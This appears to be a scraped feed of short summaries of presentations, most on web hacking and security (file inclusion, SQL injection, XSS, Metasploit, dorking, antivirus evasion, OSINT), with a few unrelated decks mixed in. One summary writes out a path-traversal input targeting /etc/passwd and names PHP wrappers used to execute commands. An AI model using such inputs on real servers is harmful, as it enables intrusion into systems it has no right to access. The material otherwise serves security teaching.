This document provides instructions for exploiting various web application vulnerabilities, including remote file inclusion (RFI), local file inclusion (LFI), SQL injection, and more. It begins by explaining RFI and how to exploit it, including using a null byte bypass. It then covers LFI and how to escalate it to remote code execution (RCE). Other sections discuss uploading shells via LFI and Firefox, exploiting vulnerabilities to download local files, full path disclosure, SQL injection techniques, and automatically uploading a shell via a phpThumb() command injection vulnerability. The document aims to serve as a tutorial for hackers to learn various web hacking methods.
This document discusses vulnerability assessment and penetration testing. It defines them as two types of vulnerability testing that search for known vulnerabilities and attempt to exploit vulnerabilities, respectively. Vulnerability assessment uses automated tools to detect known issues, while penetration testing employs hacking techniques to demonstrate how deeply vulnerabilities could be exploited like an actual attacker. Both are important security practices for identifying weaknesses and reducing risks, but require different skills and have different strengths, weaknesses, frequencies, and report outputs. Reasons for vulnerabilities include insecure coding, limited testing, and misconfigurations. The document outlines common vulnerability and attack types as well as how vulnerability assessment and penetration testing are typically conducted.
The document is a presentation on threat hunting with Splunk. It discusses threat hunting basics, data sources for threat hunting, knowing your endpoint, and using the cyber kill chain framework. It outlines an agenda that includes a hands-on walkthrough of an attack scenario using Splunk's core capabilities. It also discusses advanced threat hunting techniques and tools, enterprise security walkthroughs, and applying machine learning and data science to security.
This presentation describes penetration testing with a Who, What, Where, When, and How approach. In the presentation, you may discover the common pitfalls of a bad penetration test and you could identify a better one. You should be able to recognize and differentiate both looking at the methods (attitude) and result.
An XSS attack is a type of vulnerability that allows malicious scripts to be injected into web pages viewed by other users. There are three main types: reflected XSS occurs when a link containing malicious code is clicked; stored XSS injects code directly into a vulnerable website, potentially affecting many users; DOM-based XSS involves injecting code into a website hosted on a user's local system, allowing the attacker to access that user's browser privileges. The document provides examples of how XSS attacks work and can be used to hijack accounts, insert hostile content, steal cookies, and redirect users.
These slides guides you through the tools and techniques one can use for footprinting websites or people.You will find amazing tools and techniques have a look
Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne
Course Web page:
https://samsclass.info/124/124_F17.shtml
Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1 edition (June 8, 2014)
This 1-day course introduces network penetration testing concepts and provides an overview of the penetration testing process. It covers prerequisites, objectives, benefits, definitions, types of penetration testing and phases including reconnaissance, scanning, exploitation, and reporting. The goal is to prepare students to understand and assist with penetration tests, though they will not be able to independently conduct professional tests after this introductory course.
Understand AWS best practices for Distributed Denial of Service (DDoS) resiliency and how AWS Shield can assist you to protect your business. Uncover how this tool safeguards web applications running on AWS, and how always-on detection and automatic inline mitigations minimize application downtime and latency.
This document summarizes a presentation about penetration testing with Metasploit. It introduces penetration testing and why organizations use it. It then discusses the basics of Metasploit, including interfaces like MSFconsole. Key concepts in Metasploit like exploits, payloads, and Meterpreter are explained. The presentation demonstrates Metasploit against different operating systems like Windows XP, Windows 7, and Ubuntu. It shows how to find and use appropriate exploits and payloads to gain remote access and post-exploitation activities.
The document discusses penetration testing and related security concepts. It covers topics like vulnerability assessment, security audits, the differences between penetration testing and other assessments, common penetration testing methodologies, and the standard phases of information gathering, network mapping, vulnerability identification, exploitation, privilege escalation, maintaining access and covering tracks.
Conceito militar, agora aplicado a Cibersegurança, o "the cyber kill chain" foi desenvolvido pela Lockheed Martin em 2011. Ele descreve as fases que um adversário seguirá para alvejar uma Organização. São 7 fases bem definidas e este ataque é considerado bem sucedido
se / quando todas as fases foram realizadas.
(DOCUMENTO EM INGLÊS)
Web application attacks can take many forms, including cross-site scripting (XSS), SQL injection, parameter tampering, command injection, session management issues, cookie poisoning, directory traversal, cross-site request forgery, and buffer overflows. XSS is a vulnerability that allows malicious JavaScript code to be injected and run in a user's browser, potentially accessing data. SQL injection involves inserting SQL commands into a database query to gain unauthorized access. Parameter tampering modifies URL parameters to change expected behavior.
This document provides an overview of scanning techniques used in ethical hacking. It defines scanning as gathering information about IP addresses, operating systems, services, and architectures of target systems. The document outlines common scanning types like port scanning, network scanning, and vulnerability scanning. It also describes popular scanning tools like Nmap and Hping2, and scanning methods like ping sweeps, SYN stealth scans, and Xmas scans. The goal of scanning is to detect live systems, open ports, operating systems, and services to inform later stages of hacking like banner grabbing, vulnerability assessment, and network mapping.
Cross Site Scripting (XSS) is a vulnerability that allows malicious users to insert client-side code into web pages that is then executed by a user's browser. This code can steal cookies, access private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS works by having the server display input containing malicious JavaScript from a request. There are different types of XSS attacks, including non-persistent, persistent, and DOM-based attacks. Prevention methods include validating, sanitizing, and escaping all user input on the server-side and client-side. Web vulnerability scanners like Burp Suite can help test for XSS and other vulnerabilities.
Hunting Lateral Movement in Windows Infrastructure
The document discusses various techniques attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes how to detect remotely launched executables using Windows Event and Sysmon logs. Specific techniques covered include remote file copy over SMB, remote execution via WMI, WinRM, Powershell Remoting, scheduled tasks, services, the registry, and WMI subscriptions. The document provides the event sequences and most interesting events to look for when hunting for evidence of each technique.
This document discusses techniques for evading antivirus and firewalls, including generating executable files with embedded PowerShell commands to execute backdoors, generating macro-enabled Excel files with encoded payloads to act as Trojans, and using the Shellter tool to dynamically inject shellcode into Windows applications. Figures are provided showing the use of tools like Metasploit and Unicorn to generate payloads and backdoors, embedding them in files, bypassing antivirus detection, and attackers gaining sessions on victim machines.
Google dorks are search operators used to refine Google searches. They can be used to access secure webpages, download files, or access security cameras. Common dorks include "site:", "inurl:", "intitle:", and "filetype:" or "ext:". SQL injection is a code injection technique that exploits security vulnerabilities in database applications. It works by inserting SQL commands into user input fields to alter the meaning of SQL queries and gain unauthorized access to databases. Defenses include input validation, prepared statements, limiting privileges, and intrusion detection systems.
The document contains PHP code for a website that displays and searches product information from a database. It includes:
1. Code to connect to a MySQL database and select the "banhang" database.
2. Index code that includes header, sidebar, content, and footer files. Content displays products and handles search/detail page links.
3. Product display code that queries the database and loops through results to show images, prices and links.
4. Category, search, and detail inclusion files that query the database to populate dropdowns, search results, and detailed product pages.
The document discusses assistive technology (AT) as defined by IDEA 2004 and various examples of AT. It notes that IDEA 2004 requires IEP teams to consider AT needs for students with disabilities and that schools must provide AT and training. Several types of AT are then described, including personal amplifiers for hearing loss which reduce background noise, CCTVs for visual impairments to magnify print, talking calculators for learning disabilities in math, and page turners for physical disabilities.
This document contains a list of over 150 potential SQL injection dorks targeting parameters with "id=" in the URL. The dorks target content management systems and databases on websites. It also contains generic dorks searching for SQL warning messages.
The document discusses content sniffing vulnerabilities in web browsers. It explains that browsers try to determine the true content type of a file, even if the server provides the wrong content type header. This allows an attacker to craft a file, like an image, that is also valid HTML containing JavaScript. When the browser content sniffs the file and treats it as HTML, the JavaScript will execute in the context of the vulnerable website. The document provides examples of how this can be used to steal cookies from users and perform cross-site scripting attacks. It recommends server and browser fixes like ensuring correct content type headers and adding headers to disable content sniffing.
La inteligencia artificial (IA) es el estudio interdisciplinario de cómo crear sistemas inteligentes, como la inteligencia humana. La IA se define como la capacidad de razonar de una máquina y abarca campos como las ciencias de la computación, las matemáticas y la filosofía. Aunque las máquinas no pueden pensar como los humanos, la IA ha permitido que simulen procesos complejos, aunque con limitaciones y el riesgo de posibles consecuencias negativas si pierden el control.
The document outlines details about the Certified Ethical Hacker (CEH) certification course. The 5-day, 8 hours per day course covers topics like footprinting, reconnaissance, scanning networks, system hacking, social engineering, and cryptography. Successful students will receive the CEH certification from EC-Council after passing the online exam on the last day of training. Contact information is provided for inquiries.
This document discusses electronic voting machines (EVMs) in India and whether they can be hacked. It begins by describing what an EVM is and how it works. It then addresses whether EVMs can be hacked, explaining that while direct hacking is not possible, tampering with hardware is. The document outlines two attacks involving replacing EVM parts or using devices to change stored vote records. It notes that current safeguards are inadequate and that the lack of transparency in the EVM system means problems cannot be easily fixed. Frequently asked questions and sources are provided at the end.
This document provides instructions for making various configuration changes and restrictions in the Windows registry related to system, networking, and application settings. It includes over 50 entries organized by topic that describe how to modify registry keys and values to disable features, restrict access, and modify default behaviors. Examples include disabling the right click context menu, hiding drives, locking file associations, and restricting changes to the start menu and control panel options.
Google dorks, also known as Google hacking, involves using specific search operators and techniques on Google to find sensitive information on websites. Some key points made in the document include:
- Google dorking uses operators like "site:", "filetype:", "intitle:", and "inurl:" to refine search results and maximize search value. This can be used to uncover private information, configurations, backups, and vulnerabilities.
- Information found through Google hacking may remain exposed in Google's cache for months after being removed from websites.
- Google indexes everything publicly available on the internet, making it a powerful tool for passive information gathering, which is an important first step for hackers.
- The document encourages
This document contains notes on networking concepts including network requirements, communication media, networking devices, Ethernet cabling, OSI model, TCP/IP protocols, IP addressing, and classes of networks. It defines networking as the method of establishing a connection between two or more computers for data communication and sharing resources. Basic requirements for establishing a network include networking cards and communication media such as wired (coaxial cable, fiber optics, twisted pair) and wireless. Common networking devices are hubs, switches, routers, and bridges.
This document provides an overview of Metasploit for beginners. It discusses why Metasploit is useful, how to set up a demo environment, and how to use auxiliary and exploit modules. It then demonstrates auxiliary modules for scanning and information gathering. It also demonstrates two exploit modules against ElasticSearch and Jenkins, using reverse shell payloads. The document provides a cheat sheet for navigating msfconsole and describes common commands used prior to demonstrations.
The document contains a list of search strings that can be used to find potential vulnerabilities on websites and web applications. Some of the search strings look for pages indicating login portals for administrative access, content management systems, and other common internet-facing applications. Other search strings try to identify specific applications or technologies like vBulletin, ColdFusion, and iSecure. The overall document appears to be sharing ways to search for unprotected administrative or backend interfaces online.
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra
This document discusses techniques for countering online surveillance and protecting private communications. It begins by outlining common surveillance methods used by governments and companies, such as wiretapping and exploiting software vulnerabilities. It then discusses using cryptography to counter surveillance and keep data safe, such as encrypting files and filling volumes with cryptographically secure random data. Secure authentication techniques are presented that allow verifying credentials without revealing passwords. Finally, the document details a method for encrypting and authenticating private messages between two parties using Diffie-Hellman key exchange and digital signatures to provide encryption, authentication, deniability and perfect forward secrecy.
This document discusses common web application vulnerabilities and methods for preventing hacking. It covers code injection attacks using C99 shell, file inclusion vulnerabilities through remote and local file access, dictionary attacks, SQL injections, cross-site scripting (XSS), clickjacking, dynamic code evaluation, and countermeasures like input validation, output encoding, prepared statements, and avoiding dangerous functions. The goal is to explain how applications are hacked and defensive coding practices to prevent attacks.
This document discusses various vulnerabilities in PHP coding practices and provides examples of how each vulnerability can be exploited as well as how to fix them. It covers remote file inclusion, local file inclusion, local file disclosure, SQL injection, remote command execution, remote code execution, cross-site scripting, authentication bypass, and cross-site request forgery vulnerabilities. For each vulnerability, it provides a basic PHP code example to demonstrate the issue, how an attacker could exploit it, and recommendations on how to fix the vulnerable code, such as sanitizing user inputs, using prepared statements, and implementing authentication systems. The goal is to help PHP developers write more secure code and avoid common vulnerabilities.
This document discusses journeying from local file inclusion (LFI) vulnerabilities to remote code execution (RCE). It begins with an introduction and overview. It then covers LFI in detail, explaining how to find and exploit LFI vulnerabilities using directory traversal to read files. Next, it discusses remote file inclusion (RFI) and how it can lead to code execution. Prevention methods are outlined. Finally, it demonstrates exploiting LFI and RFI on a test server, verifying with phpinfo() and ping, before obtaining a reverse shell through a GET request. Common log locations are also listed.
This document summarizes techniques for exploiting local file inclusion (LFI) vulnerabilities to achieve remote command execution (RCE). It begins by explaining LFI and how it can be used to read local files. It then describes how LFI can be used to inject code into log files or environment variables to execute commands remotely. The document provides an introduction to using Perl sockets and libraries for creating HTTP requests, and gives an example Perl exploit script that uses log file injection to execute code via LFI. It concludes with recommendations for preventing LFI vulnerabilities.
This document discusses secure file upload in PHP web applications. It begins by describing a naive file upload implementation that allows arbitrary files to be uploaded, including PHP scripts that could execute commands on the server. It then discusses various approaches to make file uploads more secure, such as verifying the content type, image file contents, and file extensions. However, it notes that an attacker can bypass these checks by manipulating the HTTP request. The document concludes by providing a reference implementation for a more secure file upload process.
Table Of Content
The OWASP Top Ten
Invalidated Redirect and Forwards
Security Misconfiguration
Application Fingerprint
Error handling And Logging
Noise
PHP Guidelines
Web application security is an important topic gaining more attention. Sensitive data needs protection not only on servers but also when traveling over networks. Common web application vulnerabilities include cross-site scripting, SQL injection, and cross-site request forgery. Developers should implement measures like encryption, limiting file access and uploads, hiding errors, and using secure sessions to authenticate users. Security requires ongoing consideration to prevent network attacks, unauthorized access, and data theft.
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
The document discusses remote file inclusion (RFI) and local file inclusion (LFI) attacks and defenses. It provides examples of vulnerable code that allows RFI/LFI exploits by directly using unsanitized user input. It then demonstrates how to conduct RFI/LFI attacks to view files or execute commands on the server. Finally, it recommends sanitizing user input with functions like strip_tags(), htmlspecialchars(), and providing one's own cleaning function to prevent RFI/LFI exploits.
Local File Inclusion (LFI) vulnerabilities allow an attacker to include files from a web server by manipulating input that is used to include files. For example, a script that includes files based on a page parameter, like script.php?page=index.html, could be exploited by changing the page parameter to try and include files like ../../../../etc/passwd. Successful exploitation can reveal sensitive information like the server's password file. LFI vulnerabilities are common and can often be exploited through PHP wrappers like php://input or php://filter to include files or execute system commands on the server.
Short presentation on techniques for protecting against vulnerabilities in commonly available PHP packages using a combination of Apache + FastCGI + suEXEC + chroot + mod_security2
The document discusses various LAMP security practices such as preventing XSS attacks by sanitizing user input, using prepared statements to prevent SQL injection, disabling unnecessary modules and server information, limiting file uploads and access to the file system, and write protecting configuration files. It provides examples of code and configuration settings to implement these practices.
Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
The document discusses finding vulnerabilities in Flash applications through runtime analysis. It describes how uninitialized variables, external files, and dangerous native functions can be entry points for attacks. It then provides a recipe for analyzing a SWF at runtime to detect vulnerabilities, including using an analyzer framework that loads the SWF and implements resolution methods to detect undefined variables and inject attack patterns.
The document provides instructions for installing and setting up the Symfony PHP framework. It discusses different installation methods like using the sandbox, PEAR, or SVN. It also covers generating a new Symfony project and application, configuring the web server, and troubleshooting common issues. Version control of Symfony projects using Subversion is also described.
The document provides an overview of the Lumen micro-framework by Laravel. It discusses Lumen's system requirements, how to install Lumen using Composer or the Lumen installer, configuring pretty URLs, the directory structure, HTTP routing, middleware, controllers, and views. Additional features covered include caching, databases, encryption, errors and logging, events, queues, testing, and more full-stack features like authentication and mail.
This document provides an overview of the Phalcon PHP framework. It discusses why frameworks are important for PHP development and how traditional frameworks work. It then explains how Phalcon is different as it is implemented as a PHP extension written in C, making it faster than traditional frameworks. The document demonstrates how to install Phalcon, create a basic project structure, define controllers and models, and connect to a database.
The document provides guidance on releasing open source projects. It discusses security, hosting, managing source code, package management, design patterns, testing, and resources. The key recommendations are to focus on security, use GitHub for hosting, manage versions with SemVer, use Composer for dependencies, implement common design patterns, write unit tests with at least 80% coverage, and wrap resources to allow for mocking in tests.
This document summarizes a Drupal hack that occurred at the University of Toronto Libraries. The hack was detected by analyzing Apache logs and noticing odd traffic patterns, including many wp-conf requests. The hack exploited an FCKEditor bug and the PHP Filter module to inject malicious code that could execute PHP. This allowed the hacker to access files, databases, and user information. To recover, the organization restored from backups, disabled vulnerable modules, reset passwords, and improved security practices like access controls and updates. Lessons included following security guidelines, testing updates, using HTTPS, and establishing security processes and failure rehearsals.
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
During the session we will go through different methods of exploiting file upload pages in order to trigger Remote Code Execution, SQL Injection, Directory Traversal, DOS, Cross Site Scripting and else of web application vulnerabilities with demo codes. Also, we will see things from both Developers and Attackers side. What are the protections done by Developers to mitigate file upload issues by validating File Name, File Content-Type, actual File Content and how to bypass it All using 15 Technique!
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
The document discusses setting up continuous integration using Hudson. It explains that Hudson automates build and deployment processes, provides instant feedback, and helps keep teams honest about tests. Setup involves installing Java, Hudson, and configuring a sample project in Hudson to build from a Git repository on each commit.
The document discusses search operators for Yandex, a Russian search engine. It provides examples of over 20 different Yandex boolean operators like +, -, &&, ||, and others. It explains what each operator does and provides examples of queries using the various operators to refine searches on Yandex. The boolean operators allow users to search for exact phrases, exclude terms, define word proximity, search specific fields, and more.
This document discusses social media intelligence and Twitter advanced search capabilities. It introduces Twitter, explaining that it is a microblogging platform and the 8th most popular website globally. The document also outlines different advanced search operators for Twitter including searching by words, phrases, hashtags, accounts, locations, dates, and tweet properties like whether they are positive, negative, questions, or retweets. It notes that advanced search allows more precise searching than basic search to collect social mentions for social media intelligence purposes.
Recon-ng is a Python-based web reconnaissance framework that allows automated reconnaissance. It focuses on open-source intelligence gathering from web-based sources. The tool downloads from Bitbucket and has usage guides there. Recon-ng demonstrations show searching reverse domains, using the Builtwith and Punkspider modules to gather technical information, and using the LinkedIn module to find people at a specific company.
This document provides an overview of the open source intelligence (OSINT) tool Maltego. It describes what Maltego is, how it works, and how to install it. Maltego allows users to map relationships between entities like people, organizations, websites, domains, and IP addresses through the use of transforms. It gathers information from online sources and users can write their own transforms and machines. The document provides details on features of Maltego and how to download the commercial or community editions.
This document discusses search and advanced search features on LinkedIn. It introduces LinkedIn as a professional networking site and explains why it is useful for social media intelligence. It then describes LinkedIn's advanced search page and the various filters that can be used to refine searches, such as keywords, name, title, location, relationship filters, current/past companies, school, languages, interests, and premium member filters. Finally, it explains how Boolean operators like AND, OR, NOT, parentheses, and quotation marks can be used to perform more complex searches on LinkedIn.
The document discusses social media intelligence (SOCMINT) and how to use Facebook's graph search and search functions to find information about people. It provides examples of different types of queries that can be used to search for people by name, age, location, school, likes, photos, posts, and more. The case study demonstrates how to use these search functions to find information about a black hat hacker named Shadow Walker.
The document discusses the different layers of the internet, including the clearweb which is accessible via search engines, the dark web which search engines don't index, and the deep web which requires special software like Tor or I2P to access. It provides an overview of Tor and I2P anonymity networks, and how to configure them to access the deep web through URLs ending in .onion rather than standard top-level domains. The document also gives an example of a hidden wiki URL that can only be accessed through the Tor browser, not a regular browser.
Ethical Hacking (CEH) - Industrial Training Report
This document is Raghav Bisht's report on his 6-week summer training at Bytec0de Securities PVT. LTD from May 25th to July 25th 2013 under the guidance of Mr. Mohit Yadav. The report provides an overview of the training organization, outlines the training objectives and course topics covered, and thanks those who supported his training experience. Key topics covered in the training included introduction to hacking and security, ethical hacking, technology aspects of IT security, hacking steps and techniques like DDoS attacks, wireless hacking, SQL injection, and penetration testing.
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution, allowing a hacker to interfere with a database-driven application's interaction with backend databases. There are different types of SQL injections, including union-based, error-based, and blind SQL injections. Authentication can also be bypassed through SQL injection by making logical conditions like 1=1 or ""="" always true. The document provides examples of SQL injection payloads and demo websites to practice SQL injection techniques.
OS command injection vulnerabilities occur when user input is not sanitized before being passed to a shell command interpreter. This allows attackers to inject arbitrary commands that will be executed by the server, potentially compromising the server or application data. Command injection vulnerabilities are serious because they may enable attackers to use the server as a platform for launching attacks against other systems. Commix is an open source tool that can detect and exploit command injection vulnerabilities.
Introduction To Vulnerability Assessment & Penetration Testing
A vulnerability assessment identifies vulnerabilities in systems and networks to understand threats and risks. Penetration testing simulates cyber attacks to detect exploitable vulnerabilities. There are three types of penetration testing: black box with no system info; white box with full system info; and grey box with some system info. Common vulnerabilities include SQL injection, XSS, weak authentication, insecure storage, and unvalidated redirects. Tools like Nexpose, QualysGuard, and OpenVAS can automate vulnerability assessments.
Penetration testing involves evaluating systems or networks using malicious techniques to identify security vulnerabilities. It is done by exploiting vulnerabilities to gain unauthorized access to sensitive information. Common vulnerabilities arise from design errors, poor configuration, and human error. Penetration testing is conducted to secure government data transfers, protect brands, and find vulnerabilities in applications, operating systems, databases, and network equipment. Metasploit is an open-source framework used for hacking applications and operating systems that contains exploits, payloads, and modules. Msfconsole is an interface used to launch attacks and create listeners in Metasploit.
Hacking involves exploiting vulnerabilities in computer systems or networks to gain unauthorized access. There are different types of hackers, including white hat hackers who perform ethical hacking to test security, black hat hackers who perform hacking with malicious intent, and grey hat hackers who may sometimes hack ethically and sometimes not. Ethical hacking involves testing one's own systems for vulnerabilities without causing harm. Vulnerability assessments and penetration tests are common ethical hacking techniques that involve scanning for vulnerabilities and attempting to exploit them in a controlled way. Popular tools used for ethical hacking include Kali Linux, Nmap, Metasploit, and John the Ripper.
Directory traversal, also known as path traversal, allows attackers to access files and directories outside of the web server's designated root folder. This can lead to attacks like file inclusion, where malicious code is executed on the server, and source code disclosure, where sensitive application code is revealed. Local file inclusion allows attackers to include files from the local web server, while remote file inclusion includes files from external websites, potentially allowing remote code execution on the vulnerable server.
This document provides an introduction to hacking and security, defining key terms. It explains that hacking involves exploiting vulnerabilities to achieve unauthorized access. Hackers are classified as white hats (ethical), black hats (crackers), or grey hats. The document outlines the importance of understanding systems to secure them through ethical hacking and penetration testing. It lists certifications in security and provides keywords and terms for hackers to be familiar with.
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
Six months into 2024, and it is clear the privacy ecosystem takes no days off!! Regulators continue to implement and enforce new regulations, businesses strive to meet requirements, and technology advances like AI have privacy professionals scratching their heads about managing risk.
What can we learn about the first six months of data privacy trends and events in 2024? How should this inform your privacy program management for the rest of the year?
Join TrustArc, Goodwin, and Snyk privacy experts as they discuss the changes we’ve seen in the first half of 2024 and gain insight into the concrete, actionable steps you can take to up-level your privacy program in the second half of the year.
This webinar will review:
- Key changes to privacy regulations in 2024
- Key themes in privacy and data governance in 2024
- How to maximize your privacy program in the second half of 2024
To help you choose the best DiskWarrior alternative, we've compiled a comparison table summarizing the features, pros, cons, and pricing of six alternatives.
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datams and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
Your comprehensive guide to RPA in healthcare for 2024. Explore the benefits, use cases, and emerging trends of robotic process automation. Understand the challenges and prepare for the future of healthcare automation
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
YOUR RELIABLE WEB DESIGN & DEVELOPMENT TEAM — FOR LASTING SUCCESS
WPRiders is a web development company specialized in WordPress and WooCommerce websites and plugins for customers around the world. The company is headquartered in Bucharest, Romania, but our team members are located all over the world. Our customers are primarily from the US and Western Europe, but we have clients from Australia, Canada and other areas as well.
Some facts about WPRiders and why we are one of the best firms around:
More than 700 five-star reviews! You can check them here.
1500 WordPress projects delivered.
We respond 80% faster than other firms! Data provided by Freshdesk.
We’ve been in business since 2015.
We are located in 7 countries and have 22 team members.
With so many projects delivered, our team knows what works and what doesn’t when it comes to WordPress and WooCommerce.
Our team members are:
- highly experienced developers (employees & contractors with 5 -10+ years of experience),
- great designers with an eye for UX/UI with 10+ years of experience
- project managers with development background who speak both tech and non-tech
- QA specialists
- Conversion Rate Optimisation - CRO experts
They are all working together to provide you with the best possible service. We are passionate about WordPress, and we love creating custom solutions that help our clients achieve their goals.
At WPRiders, we are committed to building long-term relationships with our clients. We believe in accountability, in doing the right thing, as well as in transparency and open communication. You can read more about WPRiders on the About us page.
Blockchain technology is transforming industries and reshaping the way we conduct business, manage data, and secure transactions. Whether you're new to blockchain or looking to deepen your knowledge, our guidebook, "Blockchain for Dummies", is your ultimate resource.
7 Most Powerful Solar Storms in the History of Earth.pdf
Solar Storms (Geo Magnetic Storms) are the motion of accelerated charged particles in the solar environment with high velocities due to the coronal mass ejection (CME).
Implementations of Fused Deposition Modeling in real world
The presentation showcases the diverse real-world applications of Fused Deposition Modeling (FDM) across multiple industries:
1. **Manufacturing**: FDM is utilized in manufacturing for rapid prototyping, creating custom tools and fixtures, and producing functional end-use parts. Companies leverage its cost-effectiveness and flexibility to streamline production processes.
2. **Medical**: In the medical field, FDM is used to create patient-specific anatomical models, surgical guides, and prosthetics. Its ability to produce precise and biocompatible parts supports advancements in personalized healthcare solutions.
3. **Education**: FDM plays a crucial role in education by enabling students to learn about design and engineering through hands-on 3D printing projects. It promotes innovation and practical skill development in STEM disciplines.
4. **Science**: Researchers use FDM to prototype equipment for scientific experiments, build custom laboratory tools, and create models for visualization and testing purposes. It facilitates rapid iteration and customization in scientific endeavors.
5. **Automotive**: Automotive manufacturers employ FDM for prototyping vehicle components, tooling for assembly lines, and customized parts. It speeds up the design validation process and enhances efficiency in automotive engineering.
6. **Consumer Electronics**: FDM is utilized in consumer electronics for designing and prototyping product enclosures, casings, and internal components. It enables rapid iteration and customization to meet evolving consumer demands.
7. **Robotics**: Robotics engineers leverage FDM to prototype robot parts, create lightweight and durable components, and customize robot designs for specific applications. It supports innovation and optimization in robotic systems.
8. **Aerospace**: In aerospace, FDM is used to manufacture lightweight parts, complex geometries, and prototypes of aircraft components. It contributes to cost reduction, faster production cycles, and weight savings in aerospace engineering.
9. **Architecture**: Architects utilize FDM for creating detailed architectural models, prototypes of building components, and intricate designs. It aids in visualizing concepts, testing structural integrity, and communicating design ideas effectively.
Each industry example demonstrates how FDM enhances innovation, accelerates product development, and addresses specific challenges through advanced manufacturing capabilities.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
Presented at Gartner Data & Analytics, London Maty 2024. BT Group has used the Neo4j Graph Database to enable impressive digital transformation programs over the last 6 years. By re-imagining their operational support systems to adopt self-serve and data lead principles they have substantially reduced the number of applications and complexity of their operations. The result has been a substantial reduction in risk and costs while improving time to value, innovation, and process automation. Join this session to hear their story, the lessons they learned along the way and how their future innovation plans include the exploration of uses of EKG + Generative AI.
Transcript: Details of description part II: Describing images in practice - T...
This presentation explores the practical application of image description techniques. Familiar guidelines will be demonstrated in practice, and descriptions will be developed “live”! If you have learned a lot about the theory of image description techniques but want to feel more confident putting them into practice, this is the presentation for you. There will be useful, actionable information for everyone, whether you are working with authors, colleagues, alone, or leveraging AI as a collaborator.
Link to presentation recording and slides: https://bnctechforum.ca/sessions/details-of-description-part-ii-describing-images-in-practice/
Presented by BookNet Canada on June 25, 2024, with support from the Department of Canadian Heritage.
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
This presentation, delivered at the Postgres Bangalore (PGBLR) Meetup-2 on June 29th, 2024, dives deep into connection pooling for PostgreSQL databases. Aakash M, a PostgreSQL Tech Lead at Mydbops, explores the challenges of managing numerous connections and explains how connection pooling optimizes performance and resource utilization.
Key Takeaways:
* Understand why connection pooling is essential for high-traffic applications
* Explore various connection poolers available for PostgreSQL, including pgbouncer
* Learn the configuration options and functionalities of pgbouncer
* Discover best practices for monitoring and troubleshooting connection pooling setups
* Gain insights into real-world use cases and considerations for production environments
This presentation is ideal for:
* Database administrators (DBAs)
* Developers working with PostgreSQL
* DevOps engineers
* Anyone interested in optimizing PostgreSQL performance
Contact info@mydbops.com for PostgreSQL Managed, Consulting and Remote DBA Services
The Certified Ethical Hacker (C|EH v12) program is one of the most respected certifications in the cybersecurity field.
https://www.infosectrain.com/courses/certified-ethical-hacker-ceh-training/
The document defines security attacks and threats. It describes different types of attacks like passive attacks, active attacks, insider attacks, phishing attacks, spoofing attacks, hijack attacks, exploit attacks and password attacks. It also discusses two common threats - Cross Site Scripting (XSS) and SQL injection. XSS involves injecting malicious code snippets while SQL injection embeds malicious code in a poorly-designed app passed to the backend database.
This document discusses vulnerability assessment and penetration testing. It defines them as two types of vulnerability testing that search for known vulnerabilities and attempt to exploit vulnerabilities, respectively. Vulnerability assessment uses automated tools to detect known issues, while penetration testing employs hacking techniques to demonstrate how deeply vulnerabilities could be exploited like an actual attacker. Both are important security practices for identifying weaknesses and reducing risks, but require different skills and have different strengths, weaknesses, frequencies, and report outputs. Reasons for vulnerabilities include insecure coding, limited testing, and misconfigurations. The document outlines common vulnerability and attack types as well as how vulnerability assessment and penetration testing are typically conducted.
